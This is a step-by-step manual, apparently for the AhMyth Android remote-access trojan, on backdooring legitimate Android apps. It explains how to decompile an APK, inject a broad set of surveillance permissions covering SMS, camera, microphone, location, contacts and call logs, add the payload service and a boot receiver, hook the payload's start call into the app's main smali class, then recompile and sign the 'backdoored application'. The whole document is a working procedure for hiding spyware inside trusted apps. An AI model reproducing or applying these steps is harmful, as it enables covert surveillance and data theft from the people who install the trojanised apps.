User Manual ‐ Manually Template Original Applications ‐ Activity Based Method

Prerequisites

• Apktool
• A properly configured, decompiled AhMyth payload
• Patience

Activity Based Method

1. Decompile the original application using Apktool.

apktool d original.apk

java -jar apktool.jar d original.apk

2. Enter the decompiled application folder and open the AndroidManifest.xml file in an editor such as Visual Studio Code or Sublime.
   

3. Copy the payload permissions from the "Payload Permissions" dropdown tab below, and inject them with the applications existing permissions, then save the file. Follow the dropdown "Help" tab to view an example if you get stuck.

Payload Permissions

<uses-permission android:name="android.permission.WAKE_LOCK"/>
<uses-permission android:name="android.permission.CAMERA"/>
<uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.MANAGE_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.WRITE_SETTINGS"/>
<uses-permission android:name="android.permission.WRITE_SECURE_SETTINGS"/>
<uses-permission android:name="android.permission.INTERNET"/>
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
<uses-permission android:name="android.permission.READ_SMS"/>
<uses-permission android:name="android.permission.SEND_SMS"/>
<uses-permission android:name="android.permission.RECEIVE_SMS"/>
<uses-permission android:name="android.permission.WRITE_SMS"/>
<uses-feature android:name="android.hardware.camera"/>
<uses-feature android:name="android.hardware.camera.autofocus"/>
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
<uses-permission android:name="android.permission.READ_PHONE_STATE"/>
<uses-permission android:name="android.permission.READ_CALL_LOG"/>
<uses-permission android:name="android.permission.PROCESS_OUTGOING_CALLS"/>
<uses-permission android:name="android.permission.READ_CONTACTS"/>
<uses-permission android:name="android.permission.RECORD_AUDIO"/>
<uses-permission android:name="android.permission.MODIFY_AUDIO_SETTINGS"/>
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
<uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
<uses-permission android:name="android.permission.ACCESS_BACKGROUND_LOCATION"/>
<uses-permission android:name="android.permission.INSTALL_PACKAGE"/>

ℹ️ Help

• Original Manifest Before Injection Picture here
  

• Original Manifest After Injection Picture here

4. Copy the payload Service below, and inject it with the applications existing services, if there are no existing services in the original application's manifest then inject it before the closing </application> tag, then save the file. Follow the dropdown "Help" example for further help.

<service android:enabled="true" android:exported="false" android:name="ahmyth.mine.king.ahmyth.MainService"/>

ℹ️ Help

If the manifest contains existing services, then insert the payload service below the last service in the manifest like so:

• Before

• Picture Here
  

• After

• Picture Here
  

If the manifest does not contain any existing services, then insert the payload service just before the closing application tag in the manifest like so:

• Before

• Picture Here
  

• After

• Picture Here

5. Copy the payload Receiver below, and inject it with the applications existing services, if there are no existing services in the original application's manifest then inject it before the closing </application> tag, then save the file. Follow the dropdown "Help" example for further help.

<receiver android:enabled="true" android:exported="true" android:name="ahmyth.mine.king.ahmyth.MyReceiver">
    <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED"/>
    </intent-filter>
</receiver>

ℹ️ Help

If the manifest contains existing receivers, then insert the payload receiver below the last receiver in the manifest like so:

• Before

• Picture Here
  

• After

• Picture Here
  

If the manifest does not contain any existing receivers, then insert the payload receiver just before the closing application tag in the manifest like so:

• Before

• Picture Here
  

• After

• Picture Here
  

6. Locate the name of a suitable class for hook injection, you have three options when doing this, you can:

• Option A. Search for the application's main application class. When searching for the Main Application Class you'll want to locate the <application> tag within in the manifest contents, when you located this tag you'll then want to look for the android:name attribute, this will contain the application's Main Application Class name as well as it's path.

  • NOTE: If the android:name attribute in the <application> tag contains "android.app.Application" as it's class name and path, then skip this option and move on to option B.
    

• Option B. If Option A proves unsuitable, then you can search for the application's main launcher activity class. When searching for the main launcher activity class, look for the first occurrence of an <activity> tag that includes <intent-filter> </intent-filter> tags with the attributes android.intent.action.MAIN and android.intent.category.LAUNCHER located between them, (These intent-filters indicate that the activity is the main entry point of the application), inside the <activity> tag, you'll want to search for the android:name attribute which holds the name and path of the main launcher activity class.

  • NOTE: If the android:name attribute within the <activity> tag contains "android.app.Activity" as its class name and path, then skip this option and proceed to option C, as this doesn't point to a physical file.
    

• Option C. If both Options A and B prove unsuitable, then you can search the activity aliases for the a hookable class. When doing this you'll want to locate an <activity-alias> tag, and then locate the android:name attribute within it, one of these will point to a physical file.

  • NOTE: Keep in mind that Option C may prove to be quite time consuming for some applications, specifically large ones like Social Media apps, because the main class name and path output you get from either one of the Options in this Step is further utilised in Step 7 when we start locating the *.smali file the manifest class name and path we extracted points to, but unfortunately there is not much you can do about that, so if you end up on Option C, then continue to perform Option C with Step 7 until you locate a physical *.smali file.

• Click the dropdown "Help" tab for further information and help.

ℹ️ Help

• A: Main application class name extraction:

• Picture Here
  

• B: Main launcher activity class name extraction:

• Picture Here
  

• C: Main launcher activity class name extraction from an <activity-alias>:

• Picture Here
  

7. After you have extracted the name of a suitable Main Class from the manifest, you'll want to go ahead and open PowerShell if you're on Windows, or the Terminal if you're on Linux or macOS, and paste the appropriate command in order to quickly locate the correct ".Smali"* file we need to inject our hook into, make sure to replace path/to/original with the path to the original APK you are backdooring, and Class-Name-Here.smali with the application's main class name you extracted from the manifest.

• Windows

set-location "path/to/original"; gci -recurse -filter "Class-Name-Here.smali" -file | resolve-path -relative  

• Linux & macOS

cd path/to/original; find -name "Class-Name-Here.smali"

8. Once you have located the application's main class Smali file, we can proceed to open the file in text editor.
   

9. Now we need to insert our Payload Hook so we can allow our payload to start once the original application starts, click the dropdown ℹ️ Help tab to see how, MAKE SURE YOU READ THIS PART, MANUAL BINDING WITH AHMYTH HAS CHANGED MASSIVELY SINCE RELEASE OF v1.0-BETA.4.

Injecting the Payload Hook

• 1. Locate the 1st occurrence of the string return-void;
     

• 'First "return-void" located' Picture Here
  

• 2. Copy the new Static Payload Hook below.
     

invoke-static {}, Lahmyth/mine/king/AhMyth/MainService;->start()V

• 3. Inject the new Static Payload Hook just before the 1st occurrence of the string return-void, then save the file.
     
• 'Payload hook Inserted Before "return-void"' Picture Here

10. Head into the Decompiled APK folder of your AhMyth Payload and enter the smali directory.
    

11. Copy the payload folders inside the smali directory, excluding the android and androidx folders, these will be copied over later on.
    

12. Head back into the decompiled original application we're backdooring, and create a new smali_classes(X) directory (where "(X)" refers to the directory's respective numbering), click to the dropdown tab below to see more information about creating smali_classes(X) directories appropriately.

Creating "smali_classes(X)" Directories Appropriately

Creating smali_classes(X) directories isn't as hard as it sounds.

If the decompiled original application contains only one smali directory, then this directory will always be titled "smali", in which case all we need to do is create a new "smali_classes2" directory and paste our copied AhMyth payload folders in the newly created "smali_classes2" directory

• Before

• Picture here
  

• After

• Picture here
  

If the decompiled original application contains multiple smali directories, then that means that we have a list of smali_classes(X) folders on our hands, you'll notice these directories are numbered as well.

So in order to create our new payload directory, all we need to do is following the numbering of the directories, which simply means that we create a smali_classes(X) folder based on the numbering of the last existing smali_classes(X) folder, so for example if this last existing smali_classes(X) folder is numbered as smali_classes10, then we simply create the directory smali_classes11 and so on, the new directory's numbering should always be 1 more than the last existing smali_classes(X) folder.

• Before

• Picture here
  

• After

• Picture here
  

13. Paste the copied AhMyth payload folders into the newly created smali_classes(X) directory.
    

14. Head back into the smali folder of your decompiled AhMyth Payload, and copy the android & androidx folders.
    

15. Paste the copied android & androidx folders, into the smali folder of the Decompiled original application and replace files if prompted.
    

16. Close everything and recompile the Backdoored application using apktool.

apktool b original -o Ahmyth.apk

java -jar apktool.jar b original -o Ahmyth.apk

17. Sign the Backdoored application using an APK signer such as Uber APK Signer